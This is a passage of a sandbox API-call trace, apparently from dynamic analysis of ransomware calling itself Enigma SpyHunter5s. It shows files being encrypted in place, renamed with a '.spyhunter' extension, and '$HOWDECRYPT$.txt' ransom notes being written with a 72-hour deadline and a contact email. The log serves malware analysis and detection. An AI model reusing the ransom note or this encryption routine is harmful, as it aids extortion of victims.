lpMem=0x2ff5ec8 | out: hHeap=0x2c0000) returned 1 [0146.435] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f108 | out: pbBuffer=0x248f108) returned 1 [0146.435] GetProcessHeap () returned 0x2c0000 [0146.435] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.435] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f100*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f100*=0x30) returned 1 [0146.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.435] lstrlenW (lpString="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll") returned 75 [0146.435] StrStrW (lpFirst="MSOINTL.DLL.trx_dll", lpSrch=".txt") returned 0x0 [0146.436] GetProcessHeap () returned 0x2c0000 [0146.436] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c34bd0 [0146.436] ReadFile (in: hFile=0xb0, lpBuffer=0x2c34bd0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248f0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesRead=0x248f0c4*=0x2800, lpOverlapped=0x0) returned 1 [0146.445] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0146.445] WriteFile (in: hFile=0xb0, lpBuffer=0x2c34bd0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248f0c4, lpOverlapped=0x0 | out: lpBuffer=0x2c34bd0*, lpNumberOfBytesWritten=0x248f0c4*=0x2800, lpOverlapped=0x0) returned 1 [0146.445] GetProcessHeap () returned 0x2c0000 [0146.445] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c34bd0 | out: hHeap=0x2c0000) returned 1 [0146.445] SetFilePointerEx (in: hFile=0xb0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0146.445] WriteFile (in: hFile=0xb0, lpBuffer=0x248f104*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248f0c4, lpOverlapped=0x0 | out: lpBuffer=0x248f104*, lpNumberOfBytesWritten=0x248f0c4*=0x4, lpOverlapped=0x0) returned 1 [0146.542] WriteFile (in: hFile=0xb0, lpBuffer=0x31f200*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248f0c4, lpOverlapped=0x0 | out: lpBuffer=0x31f200*, lpNumberOfBytesWritten=0x248f0c4*=0x30, lpOverlapped=0x0) returned 1 [0146.542] CloseHandle (hObject=0xb0) returned 1 [0146.542] GetProcessHeap () returned 0x2c0000 [0146.542] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x35f878 [0146.542] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.spyhunter") returned 85 [0146.542] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll"), lpNewFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\1036\\MSOINTL.DLL.trx_dll.spyhunter" (normalized: "c:\\users\\all users\\microsoft\\office\\uicaptions\\1036\\msointl.dll.trx_dll.spyhunter")) returned 1 [0146.543] GetProcessHeap () returned 0x2c0000 [0146.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x35f878 | out: hHeap=0x2c0000) returned 1 [0146.543] GetProcessHeap () returned 0x2c0000 [0146.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.543] GetProcessHeap () returned 0x2c0000 [0146.543] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5d08 | out: hHeap=0x2c0000) returned 1 [0146.543] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb0 [0146.633] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.633] WriteFile (in: hFile=0xb0, lpBuffer=0x248f037*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f160, lpOverlapped=0x0 | out: lpBuffer=0x248f037*, lpNumberOfBytesWritten=0x248f160*=0x127, lpOverlapped=0x0) returned 1 [0146.634] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.634] WriteFile (in: hFile=0xb0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f160, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f160*=0x2ac, lpOverlapped=0x0) returned 1 [0146.634] CloseHandle (hObject=0xb0) returned 1 [0146.634] GetProcessHeap () returned 0x2c0000 [0146.634] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa3a8 | out: hHeap=0x2c0000) returned 1 [0146.634] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f100 | out: pbBuffer=0x248f100) returned 1 [0146.634] GetProcessHeap () returned 0x2c0000 [0146.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.635] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f0f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f0f8*=0x30) returned 1 [0146.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\tasks.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.635] GetProcessHeap () returned 0x2c0000 [0146.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.635] GetProcessHeap () returned 0x2c0000 [0146.635] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69190 | out: hHeap=0x2c0000) returned 1 [0146.635] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0f8 | out: pbBuffer=0x248f0f8) returned 1 [0146.635] GetProcessHeap () returned 0x2c0000 [0146.635] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.635] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f0f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f0f0*=0x30) returned 1 [0146.635] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.729] GetProcessHeap () returned 0x2c0000 [0146.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.729] GetProcessHeap () returned 0x2c0000 [0146.729] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa280 | out: hHeap=0x2c0000) returned 1 [0146.729] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0f8 | out: pbBuffer=0x248f0f8) returned 1 [0146.729] GetProcessHeap () returned 0x2c0000 [0146.729] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.729] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f0f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f0f0*=0x30) returned 1 [0146.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\scan_.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.730] GetProcessHeap () returned 0x2c0000 [0146.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.730] GetProcessHeap () returned 0x2c0000 [0146.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f69078 | out: hHeap=0x2c0000) returned 1 [0146.730] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0f0 | out: pbBuffer=0x248f0f0) returned 1 [0146.730] GetProcessHeap () returned 0x2c0000 [0146.730] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.730] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f0e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f0e8*=0x30) returned 1 [0146.730] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_queue.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.730] GetProcessHeap () returned 0x2c0000 [0146.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.730] GetProcessHeap () returned 0x2c0000 [0146.730] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffa030 | out: hHeap=0x2c0000) returned 1 [0146.731] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0f0 | out: pbBuffer=0x248f0f0) returned 1 [0146.731] GetProcessHeap () returned 0x2c0000 [0146.731] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.731] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f0e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f0e8*=0x30) returned 1 [0146.731] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\print_property.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.733] GetProcessHeap () returned 0x2c0000 [0146.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.733] GetProcessHeap () returned 0x2c0000 [0146.733] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff9f08 | out: hHeap=0x2c0000) returned 1 [0146.733] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0e8 | out: pbBuffer=0x248f0e8) returned 1 [0146.733] GetProcessHeap () returned 0x2c0000 [0146.733] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.733] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f0e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f0e0*=0x30) returned 1 [0146.733] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{e35be42d-f742-4d96-a50a-1775fb1a7a42}\\folder.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.740] GetProcessHeap () returned 0x2c0000 [0146.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.740] GetProcessHeap () returned 0x2c0000 [0146.740] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68f60 | out: hHeap=0x2c0000) returned 1 [0146.740] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0e8 | out: pbBuffer=0x248f0e8) returned 1 [0146.740] GetProcessHeap () returned 0x2c0000 [0146.740] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.740] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f0e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f0e0*=0x30) returned 1 [0146.740] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\settings.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.743] GetProcessHeap () returned 0x2c0000 [0146.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.743] GetProcessHeap () returned 0x2c0000 [0146.743] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68c18 | out: hHeap=0x2c0000) returned 1 [0146.743] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0e0 | out: pbBuffer=0x248f0e0) returned 1 [0146.743] GetProcessHeap () returned 0x2c0000 [0146.743] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f200 [0146.743] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f200*, pdwDataLen=0x248f0d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f200*, pdwDataLen=0x248f0d8*=0x30) returned 1 [0146.743] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico" (normalized: "c:\\users\\all users\\microsoft\\device stage\\task\\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\\netfol.ico"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0146.747] GetProcessHeap () returned 0x2c0000 [0146.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f200 | out: hHeap=0x2c0000) returned 1 [0146.747] GetProcessHeap () returned 0x2c0000 [0146.747] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f68588 | out: hHeap=0x2c0000) returned 1 [0146.747] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Device Stage\\Device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\device stage\\device\\{8702d817-5aad-4674-9ef3-4d3decd87120}\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0146.870] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0146.870] WriteFile (in: hFile=0x178, lpBuffer=0x248f013*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f13c, lpOverlapped=0x0 | out: lpBuffer=0x248f013*, lpNumberOfBytesWritten=0x248f13c*=0x127, lpOverlapped=0x0) returned 1 [0146.871] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0146.871] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f13c, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f13c*=0x2ac, lpOverlapped=0x0) returned 1 [0146.871] CloseHandle (hObject=0x178) returned 1 [0146.871] GetProcessHeap () returned 0x2c0000 [0146.871] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fbd520 | out: hHeap=0x2c0000) returned 1 [0146.871] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0d8 | out: pbBuffer=0x248f0d8) returned 1 [0146.871] GetProcessHeap () returned 0x2c0000 [0146.872] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0146.872] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f0d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f0d0*=0x30) returned 1 [0146.872] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\.." (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.018] GetProcessHeap () returned 0x2c0000 [0147.018] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.018] GetProcessHeap () returned 0x2c0000 [0147.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2f08 | out: hHeap=0x2c0000) returned 1 [0147.019] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248f0d8 | out: pbBuffer=0x248f0d8) returned 1 [0147.019] GetProcessHeap () returned 0x2c0000 [0147.019] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f098 [0147.019] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f098*, pdwDataLen=0x248f0d0*=0x20, dwBufLen=0x30 | out: pbData=0x31f098*, pdwDataLen=0x248f0d0*=0x30) returned 1 [0147.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\S-1-5-18\\." (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\s-1-5-18\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0147.019] GetProcessHeap () returned 0x2c0000 [0147.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f098 | out: hHeap=0x2c0000) returned 1 [0147.019] GetProcessHeap () returned 0x2c0000 [0147.019] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3a2e50 | out: hHeap=0x2c0000) returned 1 [0147.019] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\RSA\\MachineKeys\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\rsa\\machinekeys\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.020] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.020] WriteFile (in: hFile=0x178, lpBuffer=0x248f007*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f130, lpOverlapped=0x0 | out: lpBuffer=0x248f007*, lpNumberOfBytesWritten=0x248f130*=0x127, lpOverlapped=0x0) returned 1 [0147.021] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0147.021] WriteFile (in: hFile=0x178, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248f130, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248f130*=0x2ac, lpOverlapped=0x0) returned 1 [0147.021] CloseHandle (hObject=0x178) returned 1 [0147.021] GetProcessHeap () returned 0x2c0000 [0147.021] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ff5b48 | out: hHeap=0x2c0000) returned 1 [0147.021] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Crypto\\Keys\\$HOWDECRYPT$.txt" (normalized: "c:\\users\\all users\\microsoft\\crypto\\keys\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x178 [0147.022] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0147.022] WriteFile (in: hFile=0x178, lpBuffer=0x248f003*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248f12c, lpOverlapped=0x0 | out: lpBuffer=0x248f003*, lpNumberOfBytesWritten=0x248f12c*=0x127, lpOverlapped=0x0) returned 1 [0147.022] lstrlenA 